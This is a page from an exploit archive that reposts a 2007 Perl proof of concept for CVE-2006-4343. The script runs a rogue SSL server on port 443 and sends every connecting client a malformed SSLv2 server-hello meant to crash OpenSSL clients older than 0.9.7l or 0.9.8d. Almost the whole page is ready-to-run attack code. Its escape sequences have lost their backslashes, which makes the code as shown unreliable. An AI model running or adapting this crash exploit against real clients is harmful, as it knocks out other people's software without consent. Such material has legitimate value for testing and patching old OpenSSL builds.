OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit
# Published : 2007-12-23
# Author : Noam Rathaus
# Previous Title : SkyFex Client 1.0 ActiveX Start() Method Remote Stack Overflow
# Next Title : HP Software Update client 3.0.8.4 Multiple Remote Vulnerabilities

#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response

use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!n" unless $sock;
 
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());

while ( $new_sock = $sock->accept() )
{
 printf ("new connectionn");
 my $rin;
 my $line;
 my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);

 my $ciphers = "";
 my $ciphers_length = pack('n', length($ciphers));

 my $certificate = "";
 my $certificate_length = pack('n', length($certificate));

 my $packet_sslv2 =
"x04".
"x01". # Hit (default 0x01)

"x00". # No certificate

"x00x02".
$certificate_length.
$ciphers_length.
"x00x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"xf5x61x1bxc4x0bx34x1bx11x3cx52xe9x93xd1xfax29xe9";

 my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
 $packet_sslv2 = $ssl_length . $packet_sslv2;

 print $new_sock $packet_sslv2;

 close($new_sock);
}

# www.Syue.com [2007-12-23]